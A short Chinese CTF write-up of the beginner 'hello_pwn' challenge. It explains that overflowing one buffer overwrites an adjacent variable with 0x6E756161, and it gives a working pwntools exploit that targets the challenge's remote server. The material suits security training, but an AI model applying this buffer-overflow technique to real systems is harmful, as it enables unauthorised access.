新手练习04-hello_pwn

2019-02-18  本文已影响0人  n0va
image.png image.png

可以看到unk_601068跟dword_60106c是连在一起的,所以只需要在read处溢出unk_601068覆盖dword_60106c为0x6E756161即可
exp:

from pwn import *
# p = process('./hello_pwn')
p = remote("111.198.29.45","31004")
payload = 4*'a' + p32(0x6E756161)
p.sendline(payload)
p.interactive()
上一篇下一篇

猜你喜欢

热点阅读